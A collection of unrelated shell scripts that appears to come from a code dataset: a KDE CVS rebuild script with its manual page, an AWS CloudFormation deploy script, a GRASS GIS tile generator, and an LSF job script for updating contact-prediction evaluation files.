# the overall progress but makes it a PITA to work on this box. ;)
#
COMPILENICE=yes
# Set this variable to "yes" to actiave certain cheap tweaks to speed up the
# compilation process. Those tweaks mainly consist of lowering the
# optimization of the resulting binary code.
#
TWEAKCOMPILE=yes
## Don't modify anything below this line! ######################################
# These strings are defined as variables to make the output look more
# consistent.
#
STR_OKAY="done!"
STR_ERROR="failed!"
# The variables whose name is prefixed with ERR_ hold the error codes which
# are returned by the script and depend on the reason for aborting the
# execution.
#
# No error has been noticed, everything seems to be fine.
#
ERR_NO_ERROR=0
# Could not change into a directory of a module - wrong owner/access
# settings?
#
ERR_CHANGE_INTO_MOD_DIR=1
# Could not find the file 'Makefile.in' for a module, mostly happens if
# 'make -f Makefile.cvs' hasn't been executed for a module.
#
ERR_NO_MAKEFILE_IN=2
# The 'configure' command failed for a module because the system doesn't
# support certain features - I hope you activated logfile generation... ;)
#
ERR_CONFIGURE_FAIL=3
# The compilation of a module failed - if the module is defined in
# $CRITICAL_MODULES (see below) the execution is aborted, otherwise the script
# will continue with the next module.
#
ERR_COMPILE_FAIL=4
# The installation of a module failed - this mostly happens if there's not
# enough free disk space on the partition which $KDE2DIR is mounted to.
#
ERR_INSTALL_FAIL=5
# The $SRCDIR variable wasn't set or contains a non-existant directory.
#
ERR_INV_SRCDIR=6
# The $QTDIR variable wasn't set, points to a non-existant directory or
# doesn't contain a bin/, lib/, or include/ subdirectory.
#
ERR_INV_QTDIR=7
# Certain modules depend on others - those "base" modules which are required
# by others to compile and/or run should be listed here to ensure that the
# script is aborted.
#
CRITICAL_MODULES="kde-qt-addon kdesupport kdelibs kdebase"
# Internal variable, do not change.
#
DATE=`date +%Y%m%d`
# Compute the elapsed time since $STARTTIME (epoch seconds) and expose it
# through the globals DURATION, HOURS, MINUTES and SECONDS, which the
# progress messages in this script interpolate as H:M:S.
#
compute_time() {
  # $(( ... )) replaces the deprecated $[ ... ] arithmetic syntax.
  DURATION=$(( $(date +%s) - STARTTIME ))
  HOURS=$(( DURATION / 3600 ))
  MINUTES=$(( (DURATION % 3600) / 60 ))
  # NOTE: SECONDS is also bash's built-in "seconds since shell start"
  # counter; assigning it resets that counter.  The name is kept because
  # log messages elsewhere in this script read $SECONDS directly.
  SECONDS=$(( DURATION % 60 ))
}
# This function installs a compiled CVS module.
#
# Runs the prepared $MAKE_INSTALL command line (assembled in the main
# loop; may contain redirections, hence the eval), appends timing info to
# $MAKE_INSTALL_LOG, and -- right after kdebase is installed -- wipes the
# per-user KDE config (~/.kde, ~/.kderc) for every home dir in $HOMEDIR.
# Exits with $ERR_INSTALL_FAIL when a critical module fails to install.
install_module() {
  echo -n "  Installing..."
  test $LOGDIR && STARTTIME=`date +%s`
  if eval "$MAKE_INSTALL"; then
    if test $LOGDIR; then
      compute_time
      echo "Time needed for installation of module $MODULE: $HOURS:$MINUTES:$SECONDS" >> $MAKE_INSTALL_LOG
    fi
    # Compress the log if bzip2/gzip was detected earlier.
    test $CMD_COMPRESS && $CMD_COMPRESS $MAKE_INSTALL_LOG
    echo -e $STR_OKAY
    echo "Module $MODULE successfully installed in $KDE2DIR!"
    # Reset user configurations once the new kdebase is in place.
    if test "$MODULE" = kdebase -a -n $HOMEDIR; then
      for HOME in $HOMEDIR; do
        test -d $HOME/.kde -a -w $HOME/.kde && rm -rf $HOME/.kde
        test -e $HOME/.kderc -a -w $HOME/.kderc && rm -f $HOME/.kderc
      done
    fi
  else
    echo -e $STR_ERROR
    # Only abort the whole script for modules others depend on.
    echo $CRITICAL_MODULES | grep -q $MODULE && exit $ERR_INSTALL_FAIL
  fi
}
# Various checks to ensure that valid data has been specified, creates the
# directory for the logfile in case it doesn't exist already.
#
# Logfile generation is silently disabled (LOGDIR="") when the directory
# cannot be created or is not writable.
if test -n "$LOGDIR" -a ! -d "$LOGDIR"; then
  if ! mkdir -p "$LOGDIR" > /dev/null 2>&1; then
    echo "WARNING: Could not create logfile-directory."
    echo "WARNING: Logfile generation deactivated."
    LOGDIR=""
  fi
else
  if test -n "$LOGDIR" -a ! -w "$LOGDIR"; then
    echo "WARNING: Could not obtain write access to specified logfile-directory."
    echo "WARNING: Logfile generation deactivated."
    LOGDIR=""
  fi
fi
# NOTE(review): the \x00a\x00d\x020\x020 escapes look like mangled
# newline/space escapes for the later `echo -e $STR_ERROR` -- confirm
# against the original source.
test $LOGDIR && STR_ERROR="$STR_ERROR\x00a\x00d\x020\x020Check the logfile in $LOGDIR for further info."
# Abort early on an invalid source or Qt directory.
if test ! -d "$SRCDIR"; then
  echo "ERROR: Invalid source directory specified!"; exit $ERR_INV_SRCDIR
fi
if test ! -d "$QTDIR" -o ! -d "$QTDIR/lib" -o ! -d "$QTDIR/bin" -o ! -d "$QTDIR/include"; then
  echo "ERROR: Invalid Qt directory specified!"; exit $ERR_INV_QTDIR
fi
# Pick a log compressor: bzip2 preferred, gzip as fallback, else none.
if test -x /usr/bin/bzip2; then
  CMD_COMPRESS="/usr/bin/bzip2"
else
  if test -x /usr/bin/gzip; then
    CMD_COMPRESS="/usr/bin/gzip"
  else
    echo "WARNING: Neither bzip2 nor gzip was found, disabling compression of logfiles."
    CMD_COMPRESS=""
  fi
fi
# Clean the installation directory if selected.
# The glob is inside the double-quoted su command, so it is expanded by
# root's shell, not here.
#
if test "$INSTALLFROMSCRATCH" = yes; then
  if test ! -w $KDE2DIR; then
    echo "Enter the root password to clean the installation directory."
    echo "WARNING: All files and directories in $KDE2DIR will be deleted!"
    echo -n ""
    su -c"rm -rf $KDE2DIR/*"
  else
    rm -rf $KDE2DIR/*
  fi
fi
# Optionally activate cheap tweaks: disabling optimization speeds up the
# compile at the cost of slower binaries.
#
if test "$TWEAKCOMPILE" = yes; then
  CFLAGS="-O0"
  CXXFLAGS="-O0"
  export CFLAGS CXXFLAGS
fi
# Actually start doing something: configure, compile and install each
# module in $MODULES.  Failures abort the whole run only for modules
# listed in $CRITICAL_MODULES; otherwise the module is skipped.
#
for MODULE in $MODULES; do
  if ! cd $SRCDIR/$MODULE; then
    if echo $CRITICAL_MODULES | grep -q $MODULE; then
      echo "ERROR: Could not change into directory $SRCDIR/$MODULE!"
      exit $ERR_CHANGE_INTO_MOD_DIR
    else
      echo "WARNING: Could not change into directory $SRCDIR/$MODULE."
      echo "WARNING: Skipping module $MODULE."
    fi
  else
    cd $SRCDIR/$MODULE
    # Check whether 'make -f Makefile.cvs' has been called.
    #
    if test ! -e Makefile.in; then
      if echo $CRITICAL_MODULES | grep -q $MODULE; then
        echo "ERROR: Please execute 'make -f Makefile.cvs' first for this module!"
        exit $ERR_NO_MAKEFILE_IN
      else
        echo "WARNING: 'make -f Makefile.cvs' seems not to be executed for this"
        echo "WARNING: module, skipping compilation."
      fi
    else
      echo "Building module: $MODULE"
      # Configure the module.  The command line is built as a string
      # (optionally wrapped in nice and with log redirections appended)
      # and executed via eval so the redirections take effect.
      #
      echo -n "  Configuring..."
      CONFIGURE="configure --enable-debug --enable-profile --prefix=$KDE2DIR --with-qt-libs=$QTDIR"
      test "$NICECOMPILE" = yes && CONFIGURE="nice $CONFIGURE"
      CONFIGURE_LOG="$LOGDIR/$MODULE-configure-$DATE"
      if test $LOGDIR; then
        CONFIGURE="$CONFIGURE > $CONFIGURE_LOG 2>&1"
        STARTTIME=`date +%s`
      fi
      if eval "$CONFIGURE"; then
        if test $LOGDIR; then
          compute_time
          echo "Time needed for configuration of module $MODULE: $HOURS:$MINUTES:$SECONDS" >> $CONFIGURE_LOG
        fi
        test $CMD_COMPRESS && $CMD_COMPRESS $CONFIGURE_LOG
        echo -e $STR_OKAY
        # Compile the module.  Non-critical modules get "make -k" so one
        # broken subdirectory does not stop the rest.
        #
        echo -n "  Compiling..."
        MAKE="make"
        MAKE_LOG="$LOGDIR/$MODULE-build-$DATE"
        echo $CRITICAL_MODULES | grep -q $MODULE || MAKE="$MAKE -k"
        if test $LOGDIR; then
          MAKE="$MAKE > $MAKE_LOG 2>&1"
          STARTTIME=`date +%s`
        fi
        test "$NICECOMPILE" = yes && MAKE="nice $MAKE"
        if eval "$MAKE"; then
          if test $LOGDIR; then
            compute_time
            echo "Time needed for compilation of module $MODULE: $HOURS:$MINUTES:$SECONDS" >> $MAKE_LOG
          fi
          test $CMD_COMPRESS && $CMD_COMPRESS $MAKE_LOG
          echo -e $STR_OKAY
          # Install the module (as root when $KDE2DIR is not writable).
          # NOTE(review): `su -c"install_module"` starts a new shell in
          # which this script's shell function is not defined, so the
          # root-install path likely fails with "command not found" --
          # confirm and consider invoking the script itself instead.
          #
          MAKE_INSTALL="make install"
          MAKE_INSTALL_LOG="$LOGDIR/$MODULE-install-$DATE"
          test $LOGDIR && MAKE_INSTALL="$MAKE_INSTALL > $MAKE_INSTALL_LOG 2>&1"
          test "$NICECOMPILE" = yes && MAKE_INSTALL="nice $MAKE_INSTALL"
          if test ! -w $KDE2DIR; then
            echo "  Please enter the root password to install module $MODULE."
            echo -n "  "
            su -c"install_module"
          else
            install_module
          fi
        else
          echo -e $STR_ERROR
          echo $CRITICAL_MODULES | grep -q $MODULE && exit $ERR_COMPILE_FAIL
        fi
      else
        echo -e $STR_ERROR
        echo $CRITICAL_MODULES | grep -q $MODULE && exit $ERR_CONFIGURE_FAIL
      fi
    fi
  fi
done
exit $ERR_NO_ERROR
=head1 NAME
kde-rebuild - Recompiles a tree of KDE CVS modules
=head1 SYNOPSIS
kde-rebuild
=head1 DESCRIPTION
kde-rebuild is intended to recompile a tree of KDE source modules. Those
modules have to be saved in a common directory, e.g. /kde-cvs/kdelibs,
/kde-cvs/kdebase, /kde-cvs/kdegraphics etc. The script will take care
of compiling them in the correct order, checking for dependencies and
resolving them. Before first invocation, the variables at the top of the
file should be filled with appropriate values to reflect the local
setup.
Please note that KDE sources which have been downloaded via cvs,
anoncvs or cvsup have to be prepared in a special manner (e.g. execute
'make -f Makefile.cvs' and, for cvsup, link kde-common/admin to
./admin) to be compile-ready. Sources which have been acquired from
tarballs or source RPMs should be compile-ready. Refer to the
corresponding documentation at http://www.kde.org/cvsup.html for detailed
information.
=head1 RETURN VALUE
The following error codes are returned by the script.
0 - No error seems to have occured
1 - The script could not change into the directory of a module
2 - The script could not open the file 'Makefile.in' of a module
3 - The configuration of a module failed
4 - The compilation of a module failed
5 - The installation of a module failed
6 - An invalid source directory was specified
7 - An invalid Qt directory was specified
=head1 EXAMPLES
cd /home/devel/src/scripts; kde-rebuild
=head1 BUGS
Lots, mostly that the script wasn't written with portability in mind
and therefore won't run very nice on platforms other than Linux.
=head1 AUTHOR
Frerich Raabe <raabe@kde.org>
=cut
| true |
#!/bin/sh
# Deploy/update a CloudFormation stack.
# Usage: deploy.sh <template-prefix> <environment>
# Reads <prefix>-parameters-<env>.json and <prefix>-tags-common.json and
# turns them into "Key=Value" lists for `aws cloudformation deploy`.
set -e

# Build up the parameters and Tags.
# jq -r emits raw strings, so there are no quotes to strip with sed; and
# tr -d '\r' is POSIX -- the original used bash-only $'...' quoting under
# a /bin/sh shebang, which passes the pattern through unexpanded.
params=$(jq -r '.[] | (.ParameterKey + "=" + .ParameterValue)' "${1}-parameters-${2}.json" \
    | tr -d '\r' | tr '\n' ' ')

# Tags: strip spaces from the raw JSON first (values are expected to be
# space-free), map parentheses to dashes, then extract Key=Value pairs.
tags=$(sed -e 's/ *//g' "${1}-tags-common.json" \
    | tr '()' '-' \
    | jq -r '.[] | (.Key + "=" + .Value)' \
    | sed -e 's/[ \t]//g' \
    | tr -d '\r' | tr '\n' ' ')

# Update the CloudFormation Stack.
# $params / $tags are intentionally unquoted: each Key=Value pair must be
# passed as a separate argument.
aws cloudformation deploy --region us-east-1 \
    --no-fail-on-empty-changeset \
    --template-file "${1}-cfn.yaml" \
    --stack-name "${1}-${2}" \
    --capabilities CAPABILITY_NAMED_IAM \
    --parameter-overrides $params \
    --tags $tags
| true |
#!/bin/bash
# GRASS tile generator: imports a route (coordinate list or KML), then the
# zoom/tile loop below renders per-cost-surface PNG tiles and JSON indexes.
# Expected environment:
#env RUN
#env LINE
#env MINZOOM
#env MAXZOOM

# Fall back to defaults when the caller did not export these.
NAME=${NAME:-default}
MINZOOM=${MINZOOM:-2}
MAXZOOM=${MAXZOOM:-9}
to="+30 minutes"   # NOTE(review): unused in this script chunk -- confirm before removing

# Timestamp for log lines.  The original format string used %M (minute)
# and %D (mm/dd/yy) where %m (month) and %d (day) were clearly intended.
TIME=`date +"%Y-%m-%d %H:%M:%S"`
echo ${BASH_SOURCE}
swk=tile

mkdir -p "$TARGETDIR/url/${NAME}"
# Truncate the per-cost-surface JSON index files.
for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
    echo -n "" \
        > "${TARGETDIR}/url/${NAME}/${i}.json"
done

# Import the route either from the LINE coordinate list or from KML.
if [ -z "$KML" ] ; then
    echo "$TIME CREATE $RUN LINE=$LINE"
    # LINE is "lat,lon,lat,lon,..."; the perl filter regroups it into one
    # "lon,lat" pair per line for v.in.ascii.
    echo "$LINE," \
        | perl -ne 'BEGIN{$/=",";}s/,$//;if($.%2==1){$lat=$_;}else{$lon=$_;}if($.>1&&$.%2==0){print"$lon,$lat\n";}' \
        | v.in.ascii -n fs=, output=$RUN
else
    echo "$TIME CREATE $RUN KML=$KML"
    v.in.ogr -e dsn=$TARGETDIR/shapefiles output=$RUN
fi

# Create the working mapset for the line location and grab its bounding
# box (eval imports the ll_* variables printed by g.region -bg).
echo "$TIME CREATE ${LINE_LOCATION} $RUN"
g.mapset -c location=${LINE_LOCATION} mapset=$RUN
g.region -d -a vect=$RUN@PERMANENT -bg
#g.mapset location=${UNIT_LOCATION} mapset=${EDWG_MAPSET}
eval `g.region -bg`
minlat=$ll_s
minlon=$ll_w
maxlat=$ll_n
maxlon=$ll_e

echo "$TIME CREATE ${GMAP_LOCATION} $RUN"
g.mapset -c location=${GMAP_LOCATION} mapset=$RUN
# For every zoom level, compute which Google-Maps-style tiles intersect
# the route's bounding box, then render one PNG per cost surface per tile
# (skipping tiles that already exist) and append each tile's bounds + S3
# URL to the per-surface JSON index.
# NOTE(review): the repeated `date +"%Y-%M-%D %H:%M:%S"` below uses %M
# (minute) and %D (mm/dd/yy) where %m/%d were clearly intended -- the log
# timestamps are wrong.
for ((zoom=${MINZOOM};$zoom<=${MAXZOOM};zoom++)) {
    # Comma-separate the per-zoom JSON arrays after the first one.
    if [ $zoom -gt ${MINZOOM} ] ; then c="," ; else c="" ; fi
    for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
        echo "$c[$zoom" \
            >> ${TARGETDIR}/url/${NAME}/${i}.json
    done
    #res=`echo "$RESOLUTION*(2^($MAXZOOM-$zoom))" | bc`
    # Tile grid geometry at this zoom: 2^zoom tiles across 360/180 degrees.
    factor=`echo "2^$zoom" | bc`
    lon_tile_size=`echo "360/$factor" | bc -l`
    lat_tile_size=`echo "180/$factor" | bc -l`
    # Tile column/row ranges covering the bounding box (rows count down
    # from +90 latitude).
    sw_col=`echo "(180+$minlon)/$lon_tile_size" | bc -l`
    ne_col=`echo "(180+$maxlon)/$lon_tile_size" | bc -l`
    ne_row=`echo "(90-$maxlat)/$lat_tile_size" | bc -l`
    sw_row=`echo "(90-$minlat)/$lat_tile_size" | bc -l`
    # Truncate/round to integers (floor on the low side, +0.5 on the high).
    sw_col=`echo "($sw_col)/1" | bc`
    ne_col=`echo "($ne_col+0.5)/1" | bc`
    ne_row=`echo "($ne_row)/1" | bc`
    sw_row=`echo "($sw_row+0.5)/1" | bc`
    for ((x=${sw_col};$x<=${ne_col};x++)) {
        for ((y=${ne_row};$y<=${sw_row};y++)) {
            # Geographic bounds of tile (x, y).
            xmin=`echo "$x*$lon_tile_size-180" | bc -l`
            ymax=`echo "90-$y*$lat_tile_size" | bc -l`
            xmax=`echo "$xmin+$lon_tile_size" | bc -l`
            ymin=`echo "$ymax-$lat_tile_size" | bc -l`
            mkdir -p $TARGETDIR/$swk/$zoom/${BLM_COST}
            mkdir -p $TARGETDIR/$swk/$zoom/${EDWG_COST}
            mkdir -p $TARGETDIR/$swk/$zoom/${LANDCOV_COST}
            mkdir -p $TARGETDIR/$swk/$zoom/${SLOPE_COST}
            #mkdir -p $TARGETDIR/$swk/$zoom/${VEG_COST}
            # Define the tile region in the line location, export it as a
            # vector, then reproject it into the Google Maps location and
            # set a 512x512 raster region over it.
            g.mapset location=${LINE_LOCATION} mapset=$RUN
            g.region -d w=$xmin s=$ymin e=$xmax n=$ymax
            v.in.region output=$REGION --overwrite
            g.mapset location=${GMAP_LOCATION} mapset=$RUN
            g.region -d
            v.proj location=${LINE_LOCATION} mapset=$RUN input=$REGION --overwrite
            g.region vect=$REGION rows=512 cols=512
            eval `g.region -bg`
            # Record the tile bounds and its public S3 URL in each index.
            for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
                p="http://wecc-scdt-public.s3.amazonaws.com/tile/${zoom}/${i}/${x}_${y}.png"
                echo ",[$ll_s,$ll_w,$ll_n,$ll_e,\"$p\"]" \
                    >> ${TARGETDIR}/url/${NAME}/${i}.json
            done
            # Render each cost surface only if the tile PNG is missing.
            if [ ! -e ${TARGETDIR}/$swk/$zoom/${BLM_COST}/${x}_${y}.png ] ; then
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                echo "$TIME CREATE $BLM_COST in $RUN from $BLM_MAPSET column $BLM_COLUMN"
                v.proj input=${BLM_COST} location=${UNIT_LOCATION} mapset=${BLM_MAPSET}
                v.to.rast input=${BLM_COST} layer=${BLM_LAYER} \
                    output=${BLM_COST} use=attr column=${BLM_COLUMN} --overwrite
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                echo "$TIME LABEL with $BLM_WEIGHTS"
                r.category map=${BLM_COST} rules=${UNIT_PARAMETERS}/${BLM_WEIGHTS}
                r.colors map=${BLM_COST} color=rules rules=${UNIT_PARAMETERS}/${BLM_COLORS}
                r.out.png -t input=${BLM_COST} \
                    output=${TARGETDIR}/$swk/$zoom/${BLM_COST}/${x}_${y}.png
                g.remove rast=${BLM_COST} vect=${BLM_COST}
            fi
            if [ ! -e ${TARGETDIR}/$swk/$zoom/${EDWG_COST}/${x}_${y}.png ] ; then
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                #echo "$TIME CREATE $EDWG_COST in $RUN from $EDWG_MAPSET column $EDWG_COLUMN"
                #v.to.rast input=${EDWG_COST}@${EDWG_MAPSET} layer=${EDWG_LAYER} \
                #output=${EDWG_COST} use=attr column=${EDWG_COLUMN} --overwrite
                echo "$TIME CREATE $EDWG_COST in $RUN from $EDWG_MAPSET"
                r.proj input=${EDWG_COST} mapset=${EDWG_MAPSET} location=${UNIT_LOCATION} \
                    memory=$RASTER_SIZE
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                echo "$TIME LABEL with $EDWG_WEIGHTS"
                r.category map=${EDWG_COST} rules=${UNIT_PARAMETERS}/${EDWG_WEIGHTS}
                r.colors map=${EDWG_COST} color=rules rules=${UNIT_PARAMETERS}/${EDWG_COLORS}
                r.out.png -t input=${EDWG_COST} \
                    output=${TARGETDIR}/$swk/$zoom/${EDWG_COST}/${x}_${y}.png
                g.remove rast=${EDWG_COST}
            fi
            if [ ! -e ${TARGETDIR}/$swk/$zoom/${LANDCOV_COST}/${x}_${y}.png ] ; then
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                echo "$TIME CREATE $LANDCOV_COST in $RUN from $LANDCOV_MAPSET"
                r.proj input=${LANDCOV_COST} mapset=${LANDCOV_MAPSET} \
                    location=${UNIT_LOCATION} memory=$RASTER_SIZE
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                echo "$TIME LABEL with $LANDCOV_WEIGHTS"
                r.category map=${LANDCOV_COST} rules=${UNIT_PARAMETERS}/${LANDCOV_WEIGHTS}
                r.colors map=${LANDCOV_COST} color=rules \
                    rules=${UNIT_PARAMETERS}/${LANDCOV_COLORS}
                r.out.png -t input=${LANDCOV_COST} \
                    output=${TARGETDIR}/$swk/$zoom/${LANDCOV_COST}/${x}_${y}.png
                g.remove rast=${LANDCOV_COST}
            fi
            if [ ! -e ${TARGETDIR}/$swk/$zoom/${SLOPE_COST}/${x}_${y}.png ] ; then
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                #echo "$TIME CREATE $SLOPE_COST in $RUN from $SLOPE_MAPSET column $SLOPE_COLUMN"
                #v.to.rast input=${SLOPE_COST}@${SLOPE_MAPSET} layer=${SLOPE_LAYER} \
                #output=${SLOPE_COST} use=attr column=${SLOPE_COLUMN} --overwrite
                echo "$TIME CREATE $SLOPE_COST in $RUN from $SLOPE_MAPSET"
                r.proj input=${SLOPE_COST} mapset=${SLOPE_MAPSET} location=${UNIT_LOCATION} \
                    memory=$RASTER_SIZE
                TIME=`date +"%Y-%M-%D %H:%M:%S"`
                echo "$TIME LABEL with $SLOPE_WEIGHTS"
                r.category map=${SLOPE_COST} rules=${UNIT_PARAMETERS}/${SLOPE_WEIGHTS}
                r.colors map=${SLOPE_COST} color=rules rules=${UNIT_PARAMETERS}/${SLOPE_COLORS}
                r.out.png -t input=${SLOPE_COST} \
                    output=${TARGETDIR}/$swk/$zoom/${SLOPE_COST}/${x}_${y}.png
                g.remove rast=${SLOPE_COST}
            fi
            # Vegetation surface: currently disabled.
            #if [ ! -e ${TARGETDIR}/$swk/$zoom/${VEG_COST}/${x}_${y}.png ] ; then
            #TIME=`date +"%Y-%M-%D %H:%M:%S"`
            #echo "$TIME CREATE $VEG_COST in $RUN from $VEG_MAPSET column $VEG_COLUMN"
            #v.to.rast input=${VEG_COST}@${VEG_MAPSET} layer=${VEG_LAYER} \
            #output=${VEG_COST} use=attr column=${VEG_COLUMN} --overwrite
            #TIME=`date +"%Y-%M-%D %H:%M:%S"`
            #echo "$TIME LABEL with $VEG_WEIGHTS"
            #r.category map=${VEG_COST} rules=${UNIT_PARAMETERS}/${VEG_WEIGHTS}
            #r.colors map=${VEG_COST} color=rules rules=${UNIT_PARAMETERS}/${VEG_COLORS}
            #r.out.png -t input=${VEG_COST} \
            #output=${TARGETDIR}/$swk/$zoom/${VEG_COST}/${x}_${y}.png
            #g.remove rast=${VEG_COST}
            #fi
            g.remove vect=$REGION
        }
    }
    # Close this zoom level's JSON array in every index file.
    for i in $BLM_COST $EDWG_COST $LANDCOV_COST $SLOPE_COST ; do
        echo "]" \
            >> ${TARGETDIR}/url/${NAME}/${i}.json
    done
}
TIME=`date +"%Y-%M-%D %H:%M:%S"`
echo "$TIME finished $TARGETDIR"
| true |
fbeca3879f3242620e797d70079161c17585917b | Shell | susannvorberg/contact_prediction | /contact_prediction/run/run_update_evaluation_files_randomforest_models.sh | UTF-8 | 11,176 | 2.703125 | 3 | [] | no_license | #!/usr/bin/env bash
##################################################################################################################
#
# Update evaluation (and meta) files with new scores
# from Random Forest model trained on different features
#
###################################################################################################################
#-------------------------------------------------------------------------------
# load modules
#-------------------------------------------------------------------------------
module load anaconda/2
source activate py27
module load C/msgpack
module load C/armadillo
module load contactprediction/contact_prediction
#------------------------------------------------------------------------------
# set up OpenMP with only one thread to make sure that is does not use more
#------------------------------------------------------------------------------
export OMP_NUM_THREADS=8
echo "using " $OMP_NUM_THREADS "threads for omp parallelization"
#-------------------------------------------------------------------------------
# example call
#-------------------------------------------------------------------------------
#bash ~/opt/contactprediction/contact_prediction/run/run_update_evaluation_files_randomforest_models.sh
#-------------------------------------------------------------------------------
# function with actual call
#-------------------------------------------------------------------------------
# Submit one LSF job that adds a method's scores to the evaluation files.
#   $1 method_name        - name the method is registered under
#   $2 parameter_path     - path to the trained random-forest model (.pkl)
#   $3 braw_pll_path      - dir with pseudo-likelihood braw files, or "false" to skip
#   $4 braw_cd_path       - dir with contrastive-divergence braw files, or "false" to skip
#   $5 mat_baypost_path   - dir with Bayesian-posterior mat files, or "false" to skip
#   $6 mat_logbayfac_path - dir with log-Bayes-factor mat files, or "false" to skip
#   $7 script_path        - root of the contact_prediction scripts
# NOTE: call sites pass padded values such as " false "; because the call is
# made with UNQUOTED expansions, word splitting strips that padding before the
# != false tests below run. Keep the call sites unquoted for this to work.
function run_update_script {
method_name=$1
parameter_path=$2
braw_pll_path=$3
braw_cd_path=$4
mat_baypost_path=$5
mat_logbayfac_path=$6
script_path=$7
echo "---------"
echo -e "add method\t $method_name"
echo -e "parameter_path:\t $parameter_path"
# Build the argument string for add_to_evaluation_files.py. $settings is
# expanded unquoted at the bsub line so each space-separated token becomes
# its own argument (none of the fixed paths contain whitespace).
settings="/usr/users/svorber/work/data/benchmarkset_cathV4.1/dataset/dataset_properties/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/psicov/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/psipred/hhfilter_results_n5e01/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/netsurfp/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/local_methods/mi_pc/"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/local_methods/omes_fodoraldrich/"
settings=$settings" $parameter_path"
settings=$settings" /usr/users/svorber/work/data/benchmarkset_cathV4.1/evaluation/"
settings=$settings" $method_name"
settings=$settings" --n_proteins 1000"
settings=$settings" --n_threads $OMP_NUM_THREADS"
settings=$settings" --sequence_separation 12"
settings=$settings" --contact_threshold 8"
# Optional score sources: each is appended only when the caller did not pass
# the sentinel word "false".
if [ "$braw_pll_path" != false ];
then
echo -e "braw_pll_path:\t $braw_pll_path"
settings=$settings" --pll_braw "$braw_pll_path
fi
if [ "$braw_cd_path" != false ];
then
echo -e "braw_cd_path:\t $braw_cd_path"
settings=$settings" --cd_braw "$braw_cd_path
fi
if [ "$mat_baypost_path" != false ];
then
echo -e "mat_baypost_path:\t $mat_baypost_path"
settings=$settings" --bayposterior_mat "$mat_baypost_path
fi
if [ "$mat_logbayfac_path" != false ];
then
echo -e "mat_logbayfac_path:\t $mat_logbayfac_path"
settings=$settings" --bayesfactor_mat "$mat_logbayfac_path
fi
echo "Settings: "$settings
jobname=update_eval_files.$method_name
# 24h wall-clock job on the mpi queues, all slots on one host, OpenMP-aware.
bsub -W 24:00 -q mpi -m "mpi mpi2 mpi3_all hh sa" -n $OMP_NUM_THREADS -R span[hosts=1] -a openmp -J $jobname -o job-$jobname-%J.out $script_path/contact_prior/add_to_evaluation_files.py $settings
echo "---------"
}
#-------------------------------------------------------------------------------
# RF
#-------------------------------------------------------------------------------
#method_name="rf_contact_prior"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_75features.pkl"
#braw_pll_path="false"
#braw_cd_path="false"
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL
#-------------------------------------------------------------------------------
#method_name="pLL-L2normapc-RF"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc/200000contacts_1000000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
#braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
#braw_cd_path="false"
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + CD
#-------------------------------------------------------------------------------
#method_name="cd-RF"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_cd/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
#braw_pll_path="false"
#braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + Bayesian posterior
#-------------------------------------------------------------------------------
# NOTE: the padded values like " false " below rely on the UNQUOTED expansion
# in the run_update_script call to strip the surrounding blanks.
method_name="bayPost-RF"
parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_baypost/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
braw_pll_path="false"
braw_cd_path=" false "
mat_baypost_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/posterior/ "
mat_logbayfac_path=" false "
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + Bayesian likelihood (log BF)
#-------------------------------------------------------------------------------
method_name="logBF-RF"
